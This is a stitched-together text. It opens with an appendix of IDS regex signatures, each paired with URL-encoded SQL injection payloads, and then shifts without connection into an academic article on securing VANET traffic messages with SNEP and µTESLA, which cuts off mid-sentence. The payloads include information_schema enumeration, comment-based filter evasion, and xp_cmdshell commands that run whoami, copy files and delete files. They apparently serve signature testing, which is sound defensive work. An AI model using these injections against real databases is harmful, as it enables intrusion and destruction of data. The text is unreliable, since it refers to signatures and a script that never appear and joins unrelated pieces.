    1%20;%20EXEC%20xp_cmdshell%20%27whoami.exe%27
    1%20;%20EXEC%20xp_cmdshell%20%27del%20C:\xampp\test4.txt%27;
    1%20;%20EXEC%20xp_cmdshell%20print%27h%27;

S70  (?:from\W+information_schema\W)
    %20union%20select%201,table_name,3,4,5,6%20from%20information_schema.tables
    %20union%20select%201,table_name,3,4,5,6%20from%20information_schema.tables%20limit%202
    %20union%20distinctrow%20select%201,table_name,3,4,5,6%20from%20information_schema.tables%20
    %20union%20distinctrow%20select%201,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%27test%27
    %20union%20distinctrow%20select%201,table_name,3,4,5,6%20%20from%20information_schema.tables%20where%20table_schema=%27test%27

S71  (?:(?:(?:current_)?user|database|schema|connection_id)\s*\([^\)]*)
    %20union%20distinctrow%20select%201,user(),3,4,5,6%20
    %20union%20distinctrow%20select%201,database(),3,4,5,6%20
    %20union%20distinctrow%20select%201,current_user(),3,4,5,6%20
    %20or%20user()
    %20and%20schema()

S72  (?:;?\s*(?:select|union|having)\s*[^\s])
    1%20or%20%271%27=%271%27;select(1)
    1%20or%20%271%27=%271%27union%20select%201,%27A%27
    %20or%20%221%22=%221%22%20union%20distinctrow%20select%201
    %20or%20%221%22=%221%22%20having%201
    %20or%20%221%22=%221%22%20having%201%20and%201

S73  (?:exec\s+master\.)
    1%20;EXEC%20master.dbo.xp_cmdshell%20%27COPY%20C:\xampp\test.txt%20C:\xampp\test4.txt%27;
    1%20;%20EXEC%20master.dbo.xp_cmdshell%20%27whoami.exe%27
    1%20;%20EXEC%20master.dbo.xp_cmdshell%20%27del%20C:\xampp\test4.txt%27;
    1%20;reconfigure;%20EXEC%20master.dbo.xp_cmdshell%20%27del%20C:\xampp\test4.txt%27;
    1%20;%20reconfigure;%20EXEC%20master.dbo.xp_cmdshell%20%27del%20C:\xampp\test4.txt%27;

S74  (?:union select @)
    %20union%20select%20@version,2,3,4,5,6
    %20union%20select%20@version,2,3,4,5,6
    %20union%20select%20@user
    %20/**/union%20select%20@user
    %20/*!union%20select%20@user,2,3,4,5,6*/

S75  (?:\W+\d*\s*having\s*[^\s\-])
    %20or%20(1)%20having%201
    %20and%20(1)%20%20having%201
    (1)%20%20%20having%201
    (1)%20%20%20or%221%22%20having%201
    (1)%20%20%20||%221%22%20having%201

S76  (?:,.*[)\da-f"]"(?:".*"|\Z|[^"]+))
    %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a%22regexp%20%22b%22
    %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a%22%20||%20%22b%22
    %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22123%22%20||%20%22b%22
    %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a%22
    %20union%20all%20select%201,1,1,1,1,%22a%22

S77  (?:\Wselect.+\W*from)
    %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%200
    %20union%20all%20/**/select%201,1,1,1,1,1%20from%20product_tbl%20where%200
    %20union%20distinctrow%20select%201,1,1,1,1,1%20from%20product_tbl%20
    %20or%20(select%200%20from%20product_tbl%20limit%201)
    1%20;%20select%201%20from%20test2

S78  ((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*\(\s*space\s*\()
    %201%20union%20all%20select%20(space(3)),1,1
    %201%20or%20(select(space(1)))
    1%20;%20select(space(1))
    1%20;/**/%20Select(space(1))
    1%20||/**/%20Select(space(1))

S79  (?:--[^\n]*$)
    1%20--%20h
    1;%20--%20h
    1;%20Select%201%20--%20h
    %201%20or%20%221%22%20--
    %20or%200%20--

S80  (?:\<!-|-->)
    %20or%200%20%3C!--
    %20or%200%20--%20%3C!----%3E
    %20or%200%20--%20%3C!--
    %20and%200%20--%20%3C!--
    %20and%200%20--%20--%3E

S81  (?:[^*]\/\*|\*\/[^*])
    1%20;/**/insert%20into%20abc%20values(24)
    1;%20/**/Select%201
    %20or%200%20/**/%20and%200
    1;%20/**/Select/**/%201
    /*!@1*/%20and%20%221%22

S82  (?:(?:[\W\d]#|--|{)$)
    %20or%20%221%22--
    1;%20/**/Select/**/%201--
    %20or%201%20union%20select%201%20--
    %20group%20by%202--
    %20%20--

S83  (?:";\s*(?:if|while|begin))
    1%20or%20%271%27=%271%27;select(1)"
    1%20or%20%271%27=%271%27union%20select%201,%27A%27
    1%20or%20%271%27=%271%27%20union%20distinctrow%20select%201
    1%20or%20%271%27=%271%27%20having%201
    1%20or%20%272%27%20having%201%20and%201
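
The pairing of signatures and payloads in this appendix can be explored with a short script. The following is a minimal sketch, not the authors' test harness: it takes three of the signatures above (S14, S37, S65), URL-decodes a payload, and reports whether the regular expression matches. The helper name `triggers`, the dictionary `SIGNATURES`, and the case-insensitive matching are assumptions made for illustration; a real IDS may normalize input differently before matching.

```python
import re
from urllib.parse import unquote

# Three signatures copied from the appendix, with wrapped table cells joined.
SIGNATURES = {
    "S14": r'(?:\^")',
    "S37": r'(?:find_in_set\s*\()',
    "S65": r'(?:procedure\s+analyse\s*\()',
}


def triggers(sig_id: str, payload: str) -> bool:
    """Return True if the URL-decoded payload matches the given signature."""
    decoded = unquote(payload)  # e.g. %20 -> space, %22 -> double quote
    # Assumption: matching is case-insensitive; this is not stated in the appendix.
    return re.search(SIGNATURES[sig_id], decoded, re.IGNORECASE) is not None


if __name__ == "__main__":
    samples = [
        ("S14", "%20or%20%22^%22"),
        ("S37", "%20or%20find_in_set(%22a%22,NULL)"),
        ("S65", "%20limit%201,1%20procedure%20analyse()"),
    ]
    for sig_id, payload in samples:
        print(sig_id, unquote(payload), triggers(sig_id, payload))
```

Running the same check over every signature and payload pair would give a quick regression test whenever a signature is edited.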
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
Jawdat Alshaer
ABOUT THE AUTHOR
Jawdat Alshaer
Jawdat Jamil Alshaer: Received the BSc degree from the Department of
Computer Science, Mu’ta University, Jordan, in 1993, MSc degree from the
A few years ago, the automotive area of the IoT was seen as a theoretical concept; today we are already seeing not
only driverless cars but also applications of IoT in intelligent vehicles, including parking, maintaining the
environment, protecting lives and smoothing the flow of vehicle movements. We have realized the urgent need for
simple, efficient and secure protocols in the Vehicular Ad Hoc Network (VANET) that remain practical given the fast
mobility of the network nodes and that take advantage of the base station gateways along the road to inherit the
protocol from different VANETs. This reduces the communication initialization overhead and the security key
initialization each time a node passes into a new base station zone. In this research, we applied security protocols
used in sensor networks to achieve security in VANET. The simulation analysis shows that secure, practical
communication is achieved and can be passed on to other sub-VANETs. The contribution of this article is to enhance the
proposed protocols with as little cryptographic computation overhead as possible, making them applicable to the
high-mobility nature of VANET using security primitives; this guarantees security and allows fast authentication while
a vehicle passes from one VANET to the next, depending on its direction in the transportation network.
1. INTRODUCTION
The Internet of Things (IoT) is a new wave of internet technology that is transforming human lives. The traditional
internet, which is used to connect people, has now been extended to connect things. This will provide communication for
intelligent service pooling, using low-cost internet-connected devices and sensors while applying intelligent
algorithms. These days, people’s lives and jobs continuously require them to be both mobile and online, even when they
are driving a vehicle. The OBD/OBD-II diagnostics port (which is like a computer) monitors emissions, mileage, speed,
and engine functions, as well as road traffic and conditions. This information can be displayed on special screens or
sent to service specialists for analysis. Alerts related to the vehicle, such as open doors, lights left on or the
hand brake, or related to the trip conditions, require the driver or the automated vehicle control to act on certain
vehicle parts, for example to lock or unlock the doors, start the ABS system and, in some cases, safely stop the
vehicle. Vehicles may also be equipped with GPS, gyroscope, orientation and accelerometer sensors, which can be used to
model driving behavior.
Safety sensors are the basis of safety systems and focus on recognizing accident hazards and events in near real time.
By mounting specific equipment in the vehicle, sensor readings can be processed to match driving patterns with road
conditions, such as icy roads, turns, obstacles and traffic jams. By actively monitoring different parameters while
processing and intelligently analyzing sensor readings, drivers can get real-time alerts and warnings on their screens
and smart devices, and technical faults can be identified for early handling. By allowing Vehicular Ad hoc Networks
(VANETs) between vehicles, Roadside Units (RSU), and a Base Station (BS), as in figure 1, useful information
regarding road status and emergency situations can readily be made available to other vehicles, government
authorities, and service stations; this will enable better traffic performance and help save lives.
2. NETWORK ARCHITECTURE
The purpose of this research is to achieve a Secure Intelligent Transportation System (SITS). A layered structure of
VANET, as in figure 2, gives the ability to isolate the main functionality from the basic infrastructure, and allows
intelligent algorithms to process and classify different sensor data readings, with these algorithms embedded in the
application layer.
Vehicle data communication is an added network technology resulting from the revolution in vehicle technical and
communication specifications. Each moving vehicle is equipped with sensors, processing units and transmission
channels, with location- and context-aware properties [2]. Base Stations (BS) on roads form the gateways for these
networks. Vehicles enter the signal range of one BS, joining one VANET, then exit to another, allowing communication
between vehicles in the same zone and the BS. VANET deploys and integrates different technologies for simple, effective
and secure communication: Wi-Fi IEEE 802.11, WAVE IEEE 1609, WiMAX IEEE 802.16, Bluetooth, IRA, and ZigBee.
The communication can be extended to rich media streaming communication between vehicles, infotainment and
telemetric. Mobile IPv6, an enhanced version of Mobile IP, allows message exchange in the high-mobility VANET
environment to be performed even during fast, continuous location changes. VANET can take advantage of all these
communication capabilities by intelligently applying the right connection for the given spatial and temporal
conditions. However, assuring security, as in all other new technologies, is still a challenge, and VANET is not
an exception.
Vehicular Ad hoc Network (VANET) was derived from Mobile Ad hoc Network (MANET), which has a self-organizing
architecture, used to connect mobile devices via wireless link. In this infrastructure, there is no central authority,
which means both of the networks are self-organized and decentralized systems. Security approaches must not rely on
central services provided by fixed infrastructure as nodes in these networks are independently mobile. Due to the
absence of a central authority, the attacker can easily join the network and perform malicious activities. Various
trust-based security architectures were proposed to overcome this fault. This research proposes applying security
primitives of sensor networks on VANET protocols in order to maintain data communication in a secure manner in
the high mobility nature of VANET.
As part of IoT, achieving SITS requires intelligent technical inspection and classification of vehicles’ sensor data
[3], [4]: allowing the exchange of messages, securing the sources, applying an intelligent choice of cryptography,
enforcing semantic security, and applying the principle of categorizing who needs to know which information, so that
critical information is delivered in real time and in a secure and urgent fashion. Other, non-critical messages can
still be transmitted using any of the more complex proposed protocols, so the intelligent classification of messages
is essential in this process.
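
The classification step described above can be sketched in a few lines. This is only an illustration under stated assumptions: the message kinds in `URGENT_KINDS`, the `Message` type, and the two protocol labels are hypothetical, and a fixed rule set stands in for whatever intelligent classifier a base station would actually run.

```python
from dataclasses import dataclass
from enum import Enum


class Protocol(Enum):
    # Hypothetical labels for the two protocol families discussed in the text.
    LIGHTWEIGHT_SYMMETRIC = "lightweight symmetric protocol"
    HEAVYWEIGHT = "more complex protocol"


@dataclass
class Message:
    kind: str       # e.g. "icy_road", "video_stream" (illustrative values)
    payload: bytes


# Assumption: a fixed set of urgent message kinds stands in for the classifier.
URGENT_KINDS = {"collision_warning", "icy_road", "emergency_brake"}


def choose_protocol(msg: Message) -> Protocol:
    """Route urgent sensor messages to the fast path, everything else to the rich path."""
    if msg.kind in URGENT_KINDS:
        return Protocol.LIGHTWEIGHT_SYMMETRIC
    return Protocol.HEAVYWEIGHT


if __name__ == "__main__":
    for m in (Message("icy_road", b"km 12"), Message("video_stream", b"...")):
        print(m.kind, "->", choose_protocol(m).value)
```

The point of the sketch is the separation of concerns: the decision about which protocol to use is made once per message, before any cryptographic work is done.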
Intelligence gives VANET the best quality of service, as introduced in [5]: it smoothly manages traffic flows,
improves the traffic experience, and reduces the loss of life and risks on the roads. The deployment of
intelligent roadside gateways, which usually have high processing power and a large amount of memory and bandwidth,
allows specific classification algorithms to run and information to be visualized with video and audio support. This
will reduce the processing and load handling required of the mobile nodes in the VANET.
Applying the proposed layered architecture, figure 2, will require constructing a VANET structure with intelligent
layers for implementing a pool of classified services and functionality and flow of messages. This research proposes
security primitives to be part of the VANET layer structure and to be applied in the transmission of sensitive, classified
sensor data in a fast, secure manner.
3. LITERATURE REVIEW
Applying cryptography to VANET communications using symmetric keys is more efficient in computation and
transmission terms; however, it does not protect against the repudiation of messages. Digital signatures were
proposed to solve this problem, such as the Group Signatures (GS) in [6], where a table of the signatures of all nodes
is saved and maintained in each node to prevent repudiation of messages. In [7], traditional Public Key
Cryptography (PKC) was proposed to achieve semantic security. In this work, the reliability of messages is totally
dependent on the number of nodes delivering the same information. Vehicles are frequently allowed to change their
identities. This approach can consume a large amount of storage and cause delays in the transmission of messages.
Using identity-based signatures and batch verification was proposed in [8]. This security approach requires
updating the anonymous identity in a time-synchronized manner. However, almost all proposed works require
buffering each node’s identical signature and continuously changing identity in the network, and they carry the
overhead of maintaining and transmitting keys between nodes. In the current work, symmetric mechanisms are proposed,
with integrity assured through the use of message counters and time-synchronized key disclosure, which was originally
proposed for sensor networks in [9]. Raw et al. in [10] highlighted different security mechanisms for secure routing
protocols and integrity, which can guide researchers toward more efficient integrity in VANET. Still, the computation
and transmission cost of applying these mechanisms is high. The Multi Channels Model was proposed by Shukla et al. in
[11] for securing VANET network functionality while assuring confidentiality. However, it cannot be imposed on
industry infrastructure for use in all vehicle types. Islam et al. in [12] used a public key mechanism to assure the
authentication, integrity, and non-repudiation security requirements in VANET. The methods used include updating
security certificates when a vehicle enters a new VANET zone, decreasing authentication time and, as a result,
decreasing the message delay time.
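
The message-counter idea mentioned above can be illustrated with a small sketch. It is a simplification under stated assumptions, not the protocol of [9]: HMAC-SHA256 is swapped in as the authentication code, the counter is sent in the clear alongside the message, and the class names `Sender` and `Receiver` are hypothetical. Time-synchronized key disclosure is not covered here.

```python
import hashlib
import hmac
import struct


def _tag(key: bytes, counter: int, message: bytes) -> bytes:
    # Bind the counter to the message so an old tag cannot be reused.
    header = struct.pack(">Q", counter)  # 8-byte big-endian counter
    return hmac.new(key, header + message, hashlib.sha256).digest()


class Sender:
    def __init__(self, key: bytes):
        self.key = key
        self.counter = 0

    def send(self, message: bytes):
        self.counter += 1
        return self.counter, message, _tag(self.key, self.counter, message)


class Receiver:
    def __init__(self, key: bytes):
        self.key = key
        self.last_counter = 0

    def accept(self, counter: int, message: bytes, tag: bytes) -> bool:
        expected = _tag(self.key, counter, message)
        if not hmac.compare_digest(expected, tag):
            return False              # tampered message or wrong key
        if counter <= self.last_counter:
            return False              # replayed or stale message
        self.last_counter = counter
        return True


if __name__ == "__main__":
    key = b"\x01" * 32                # illustrative shared key only
    sender, receiver = Sender(key), Receiver(key)
    packet = sender.send(b"icy road ahead")
    print(receiver.accept(*packet))   # first delivery
    print(receiver.accept(*packet))   # same packet replayed
```

Because only one hash-based operation is needed per message, this kind of check is cheap compared with verifying a public-key signature, which is the efficiency argument the paragraph makes for symmetric mechanisms.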
Ming-Chin et al. in [13] proposed a privacy preservation authentication scheme (PPAS) for VANETs. PPAS is intended
to be lightweight and to solve many security issues, but it can be applied only to message exchange between a vehicle
and a base station, without considering the security issues of vehicle-to-vehicle communication. In earlier research,
Ming-Chin et al. [14] realized the need for a VANET security protocol to be practical in the high-mobility environment
of VANET. They proposed a trust-extended authentication mechanism (TEAM) for VANET with lightweight cryptography
and performed a simulation demonstrating the efficiency of the proposed security methods. However, their work partly
relies on technical hardware modifications, which can be considered a restriction of their work.
There are many security methods proposed for VANET; a complete list of proposed VANET security and privacy
methods was studied by Marvy B. et al. in [15] and is summarized in table 1.
Most proposed security protocols and methods assure security but are impractical in VANET, as each node must
buffer all other nodes' private keys and certificates, which is difficult and can result in storage overload in addition
to transmission delay. To achieve semantic security, A. Perrig et al. in [9] proposed two secure protocols (SNEP and
TESLA) for securing messages in sensor networks, where SNEP guarantees confidentiality, authentication, integrity
and freshness. TESLA is used for authenticated broadcasting and strong freshness assurance. They recommended
their security protocols for a higher level of communications; the current research adopts their methods for sensor
data transmission in VANET. We propose that sensor protocols be applied to emergency messages that are
intelligently classified as urgent by an algorithm residing in the base stations, which chooses the right security
protocol for each packet to assure secure, fast delivery of urgent sensor readings. Other messages, such as
entertainment messages and streams, can use different protocols that allow rich content communication. In this
work, we focus on transmitting short messages using the well-studied sensor security primitives proposed and proved
efficient in [9].
VANET applies IEEE 802.11p, a modified version of IEEE 802.11 that was developed by IEEE for vehicular networks.
The modifications were mostly done in the network layer, as shown in figure 2. Many wireless technologies, such as
IEEE 802.11p, are standards for Dedicated Short Range Communication (DSRC) [16], including:
• 4G Long Term Evolution (LTE), which has been proposed for reliable vehicular communications,
• A modified version named 802.11p, developed by IEEE for vehicular networks; for dynamic multimedia
support, Wi-Fi (IEEE 802.11) and WiMAX (IEEE 802.16) are used.
VANET allows communication between vehicles and roadside stations according to their spatial and temporal
parameters. This provides a direct flow of messages between vehicles with or without the roadside station gateways;
a Mobile IPv6 proxy-based architecture supports these two scenarios. VANET is intended to connect vehicles with each
other and with fixed stations (mobile and stationary nodes) that provide a gateway to the WAN. Vehicles equipped with
GPS, communication devices, and processors are location aware, as stated in [1], and get connected with each other
and to fixed road gateways locally by periodically exchanging messages containing their identity, time, velocity,
direction and empty content. A list of active nodes is maintained in the ad hoc network, and inactive ones are deleted.
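The beacon exchange and the active node list described above can be sketched as follows. This is only an illustration under stated assumptions: the class names, the field units, and the `timeout` parameter are hypothetical and do not come from the article or from any standard.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Beacon:
    """Periodic message with the fields named in the text (empty payload)."""
    node_id: str       # vehicle identity
    timestamp: float   # sender clock in seconds (assumed unit)
    velocity: float    # metres per second (assumed unit)
    direction: float   # heading in degrees (assumed unit)


class ActiveNodeList:
    """Keeps the latest beacon per node and deletes nodes that fall silent."""

    def __init__(self, timeout: float = 3.0):
        # timeout is a hypothetical parameter: seconds without a beacon
        # after which a node is treated as inactive.
        self.timeout = timeout
        self._last_seen: Dict[str, Beacon] = {}

    def on_beacon(self, beacon: Beacon) -> None:
        """Record (or refresh) the sender of a received beacon."""
        self._last_seen[beacon.node_id] = beacon

    def prune(self, now: float) -> List[str]:
        """Delete inactive nodes and return their identifiers."""
        stale = [node_id for node_id, beacon in self._last_seen.items()
                 if now - beacon.timestamp > self.timeout]
        for node_id in stale:
            del self._last_seen[node_id]
        return stale

    def active(self) -> List[str]:
        """Return the identifiers of the nodes currently considered active."""
        return sorted(self._last_seen)
```

A base station or vehicle would call `on_beacon` for every received beacon and `prune` on a timer; the choice of timeout would depend on the beacon period and the vehicle speed.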
The previously explained layered architecture of vehicle nodes provides different capabilities and constraints, as
shown below:
• A VANET consists of vehicle nodes and a base station, which is the gateway to the wide area network,
• The moving nodes form a routing tree with the BS as its root, meaning each VANET can be represented
with a tree data structure; multiple VANETs form a forest (multiple trees),
• The periodic transmission of messages (beacons) constructs the routing topology, in which addressing allows
the exchange of messages.
• Trust Requirements: Usually, VANETs are distributed in different zones, that is, vehicles can move
continuously through untrusted zones. This can threaten the security of network communications. Keep in
mind that wireless communication is an untrusted broadcast, and adversaries are expected to be able to
eavesdrop, replay and inject messages; hence, the proposed security protocol must enforce security on
each node, including the BS. Adopting this strategy from [9], all vehicle nodes must initially trust the BS
through a key shared between both, and a sequence of keys is then derived from the original one. Each node
has a local clock used for the broadcast protocol.
• Data Confidentiality: Vehicle nodes must exchange only encrypted messages over secured channels.
• Data Authentication: Vehicle nodes must be authenticated before the information is accepted on the receiver
side. Data authentication is achieved through a symmetric key used for Message Authentication Code (MAC)
calculation. Even with a MAC, any receiver who knows the key can send malicious messages with a fake
identity. Solving this problem requires an asymmetric mechanism generated from the symmetric one using the
contribution of [9], by constructing an asymmetric broadcast using delayed key disclosure and a one-way
function.
• Data Integrity: ensures that messages were not altered; in this work, integrity is already provided by the data
authentication policies.
To achieve the required security, two building blocks were adopted from [9], namely the design and implementation
of two secure protocols, SNEP and TESLA, for securing messages. SNEP guarantees confidentiality, authentication,
integrity and freshness. A secret key is shared between each node and the BS, and then between the sender and
receiver nodes. The protocol is extended to establish trust between all new nodes in the network. As we propose
dividing the VANET in an area into a group of sub-VANETs, each connected to an individual base station gateway,
TESLA is used for authenticated broadcasting and strong freshness assurance. Table 2 lists the notations and
descriptions used in constructing the proposed security protocol.
Notation      Description
A, B          Communication nodes
N_A           The nonce (can be a bit string) generated by A
M1 | M2       Concatenation of message M1 and message M2
K_AB          Symmetric shared key between A and B
K_m           Secret master key between base station and node
C_AB          The cipher text of message M generated using K_AB
C(K_AB, x)    Cipher text with block chaining
It was proved in [9] that applying SNEP in sensor networks assures confidentiality, authentication, integrity, and
freshness. The cryptographic primitives were used efficiently in sensor networks with restricted memory, processing
and energy.
We claim that the same advantages can be obtained by applying SNEP in VANET, because VANET has a similar main
restriction: the communication bandwidth and the delay between vehicles must be kept low while they move fast and
pass from one VANET to another. SNEP works simply by adding a few bytes to each message, providing semantic
security while keeping the communication protocol efficient. The key ingredient is the bit string appended to the
chain of messages encrypted with a block-chaining algorithm, DES for example. For two-node authentication, a MAC
is used.
SNEP provides semantic security without transmission overhead by sharing a counter between nodes. Each node's
implicit counter is incremented as messages are exchanged and does not need to be transmitted. Successive messages
are therefore encrypted differently, according to each node's implicit counter. To ensure freshness, the requesting
node can send a nonce, and the responder node sends the nonce back as part of the response message. The cipher text
is generated by applying the encryption key and the counter to the original message [9], as in (1):
E = {D}<K_enc, CTR>    (1)
where D is the data, encrypted using the encryption key K_enc together with the implicit counter (CTR) held by the
sender. A Message Authentication Code (MAC) that identifies the sender to the receiver node is then generated; the
CBC-MAC from [16] is used and concatenated with the cipher text, as in (2):
M = MAC(K_mac, CTR | E)    (2)
All keys are derived from the master key using a one-way function, as in equation (5).
The complete message sent from A to B is constructed from equations (1) and (2) as in [9] and includes two parts,
the encrypted message and the MAC, as in (3):
A → B : {D}<K_enc, CTR>, MAC(K_mac, CTR | {D}<K_enc, CTR>)    (3)
SNEP offers the following advantages:
• Low communication requirements: the counter is incremented implicitly and does not need to be
transmitted while the vehicle is moving within the range of the VANET to which the node belongs; this
increases security while lowering the transmission time, which is critical in VANET topology and is the core
goal of this research.
• Data authentication: whenever a message is received, the MAC must verify correctly.
• Replay protection: the synchronized implicit counter on both sides prevents replaying old messages.
• Message ordering: the right sequence of messages between nodes is ensured by each node's implicit counter.
• Data freshness: nodes achieve freshness using a nonce, which is generated and sent with a request and is
then embedded in the MAC computation of the response message; a response message may contain
handshake information or general or emergency information, as in (4):
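A → B : N_A, R_A
B → A : {R_B}<K_enc, CTR>, MAC(K_mac, N_A | CTR | {R_B}<K_enc, CTR>)    (4)
Here R_A and R_B denote the request and the response, following [9]. Node A generates a nonce using random number
generation and sends it to node B with the request. Node B responds with the encrypted response and a MAC that
covers the nonce; A then receives the response, verifies the MAC, and so recognizes the responder node and the
freshness of the contents.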
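The SNEP message flow described above (implicit counter, MAC over counter and cipher text, nonce bound into the response) can be sketched in a few lines. This is a minimal illustration, not the implementation from [9]: HMAC-SHA256 from the Python standard library stands in for both the RC5 counter-mode cipher and the CBC-MAC, the key derivation labels are arbitrary, a single counter is used for one direction only, and all function and class names are hypothetical.

```python
import hashlib
import hmac


def prf(key: bytes, data: bytes) -> bytes:
    """HMAC-SHA256, an assumed stand-in for the one-way function and cipher."""
    return hmac.new(key, data, hashlib.sha256).digest()


def derive_keys(master_key: bytes):
    """Derive independent encryption and MAC keys from the master key."""
    return prf(master_key, b"enc"), prf(master_key, b"mac")


def ctr_xor(k_enc: bytes, ctr: int, data: bytes) -> bytes:
    """Counter-mode style encryption/decryption: XOR data with a keystream."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = prf(k_enc, ctr.to_bytes(8, "big") + offset.to_bytes(4, "big"))
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def snep_mac(k_mac: bytes, ctr: int, cipher: bytes, nonce: bytes = b"") -> bytes:
    """8-byte MAC over nonce | counter | cipher text."""
    return prf(k_mac, nonce + ctr.to_bytes(8, "big") + cipher)[:8]


class SnepEndpoint:
    """One side of a SNEP-like channel; the counter is never transmitted."""

    def __init__(self, master_key: bytes):
        self.k_enc, self.k_mac = derive_keys(master_key)
        self.ctr = 0  # implicit counter shared by both sides

    def send(self, data: bytes, nonce: bytes = b""):
        """Return (cipher text, MAC) and advance the implicit counter."""
        cipher = ctr_xor(self.k_enc, self.ctr, data)
        tag = snep_mac(self.k_mac, self.ctr, cipher, nonce)
        self.ctr += 1
        return cipher, tag

    def receive(self, cipher: bytes, tag: bytes, nonce: bytes = b"") -> bytes:
        """Verify the MAC against the local counter, then decrypt."""
        expected = snep_mac(self.k_mac, self.ctr, cipher, nonce)
        if not hmac.compare_digest(tag, expected):
            raise ValueError("MAC check failed: forged, replayed or stale")
        data = ctr_xor(self.k_enc, self.ctr, cipher)
        self.ctr += 1
        return data
```

In this sketch, node B would answer a request carrying nonce N_A with `send(response, nonce=N_A)`, and node A would call `receive(cipher, tag, nonce=N_A)`. Sending the same plaintext twice yields different cipher texts because the counter changes, and a replayed message fails the MAC check because the receiver's counter has moved on.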
Most proposals in the literature for authentication in VANET use asymmetric digital signatures, which introduce a
long communication delay for creating, sending, receiving, and verifying the signature before the exchange of
information messages can start. Applying asymmetric mechanisms in VANET is therefore impractical, because
communication time is critical when vehicles pass quickly between different base stations. To overcome this
problem, the TESLA protocol was proposed in [17] and [9] for providing broadcast while ensuring security. TESLA can
be applied in VANET because processing and energy are not limited; however, delay is critical and messages must be
transmitted in real time. A modified version that provides faster authentication and broadcasting can be even more
applicable in VANET. The TESLA protocol was redesigned as follows:
Modified TESLA (µTESLA) requires that the BS and the vehicles are loosely time synchronized; the clock time of each
must be part of the key generation. Communication is initialized by the base station, which periodically broadcasts a
packet to all nodes together with a MAC computed on the message with a secret key. A receiving node knows,
according to the synchronized time stamp, that the MAC key is still known only by the BS, so the original message
cannot have been altered, and it stores the message in its buffer. Soon afterwards, the BS broadcasts the key to all
nodes, which verify the key and use it to authenticate the stored messages. The BS and all nodes maintain a chain of
MAC keys generated by a one-way function according to a time schedule that depends on the time a vehicle takes to
pass through the VANET. To communicate at any particular time, the sender node picks the last key of the chain, K_n,
and repeatedly applies the one-way function F from [9] to generate the other keys (the key chain), as in (5):
K_i = F(K_{i+1})    (5)
The advantage of the one-way key chain is that once the receiver has an authenticated key of the chain, subsequent
keys of the chain can be used and authenticated.
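The one-way key chain of equation (5) can be illustrated with a short sketch. SHA-256 is used here as an assumed stand-in for the one-way function F, and the function names are hypothetical; the article does not prescribe a particular hash.

```python
import hashlib
from typing import List


def F(key: bytes) -> bytes:
    """One-way function; SHA-256 is an assumption made for illustration."""
    return hashlib.sha256(key).digest()


def make_key_chain(last_key: bytes, n: int) -> List[bytes]:
    """Return [K_0, ..., K_n] with K_i = F(K_{i+1}), starting from K_n."""
    chain = [last_key]
    for _ in range(n):
        chain.append(F(chain[-1]))
    chain.reverse()  # chain[0] is K_0, the commitment given to receivers
    return chain


def authenticate_key(candidate: bytes, trusted: bytes, max_steps: int) -> bool:
    """Accept candidate if applying F at most max_steps times yields trusted."""
    key = candidate
    for _ in range(max_steps):
        key = F(key)
        if key == trusted:
            return True
    return False
```

The sender generates the chain backwards from K_n but discloses it forwards (K_1, K_2, ...). A receiver that holds an authenticated K_0 can check any later key by hashing it back to K_0, while nobody can compute K_{i+1} from K_i.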
To communicate, each node needs to perform time synchronization and obtain the key from the BS whenever it leaves
one sub-VANET and connects to the next one, as all VANETs apply the same protocol with different parameters and
key chains.
Figure 3 shows an example of µTESLA. Each key belongs to a sequence of keys that is updated periodically, with a
static real-time stamp, for authenticating messages. The same key chain is used in different sub-VANETs, where each
base station represents the sub-VANET of a specific cluster (zone), allowing the stream of messages to continue in
that zone, as messages are usually related to specific zone conditions. Later in time, a new key is used in the zone.
At any particular time, the key used for previous messages can be calculated from the current one broadcast by the
BS, as the keys are time synchronized between nodes. This is applicable as most messages are real-time ones;
however, previous keys can also be derived for old messages.
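The receiver side of the delayed key disclosure described above can be sketched as follows. This is a simplified illustration under several assumptions: SHA-256 and a truncated HMAC-SHA256 stand in for the one-way function and the MAC, time intervals are plain integers, and the `Receiver` class and its methods are hypothetical names rather than part of µTESLA as specified in [9].

```python
import hashlib
import hmac
from typing import Dict, List, Tuple


def F(key: bytes) -> bytes:
    """One-way function (SHA-256 as an assumed stand-in)."""
    return hashlib.sha256(key).digest()


def mac(key: bytes, msg: bytes) -> bytes:
    """8-byte MAC (truncated HMAC-SHA256 as an assumed stand-in)."""
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


class Receiver:
    """Buffers broadcasts until the BS discloses the key of their interval."""

    def __init__(self, commitment: bytes):
        self.trusted_key = commitment   # K_0, obtained securely from the BS
        self.trusted_interval = 0
        self.buffer: Dict[int, List[Tuple[bytes, bytes]]] = {}

    def on_message(self, interval: int, msg: bytes, tag: bytes) -> None:
        # Only buffer messages whose key has not been disclosed yet; once a
        # key is public, anyone could have forged the MAC.
        if interval > self.trusted_interval:
            self.buffer.setdefault(interval, []).append((msg, tag))

    def on_key_disclosed(self, interval: int, key: bytes) -> List[bytes]:
        """Verify the disclosed key, then authenticate buffered messages."""
        steps = interval - self.trusted_interval
        if steps <= 0:
            return []
        check = key
        for _ in range(steps):
            check = F(check)
        if check != self.trusted_key:
            return []                    # key is not on the chain: reject
        authenticated = []
        k = key
        # Walk back through the chain so that messages from earlier
        # intervals (whose disclosure was missed) are authenticated too.
        for i in range(interval, self.trusted_interval, -1):
            for msg, tag in self.buffer.pop(i, []):
                if hmac.compare_digest(tag, mac(k, msg)):
                    authenticated.append(msg)
            k = F(k)
        self.trusted_key, self.trusted_interval = key, interval
        return authenticated
```

The walk back through the chain reflects the remark that previous keys can be derived from the current one for old messages. A real deployment would also need the loose clock synchronization and a disclosure delay matched to the time schedule, which this sketch leaves out.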
In VANET, the constraints on vehicle movement and the high speed result in vehicles rapidly joining and leaving
different network zones, where each zone is a VANET with a BS gateway; this leads to challenges in feasibility,
security and efficiency. Despite these challenges in VANET topology, successful network communication requires
strong cryptography. VANET hardware includes many sensors and strong processing units: all nodes in VANET are
equipped with sensors, controllers, and processors, and they generate and exchange information. Random numbers
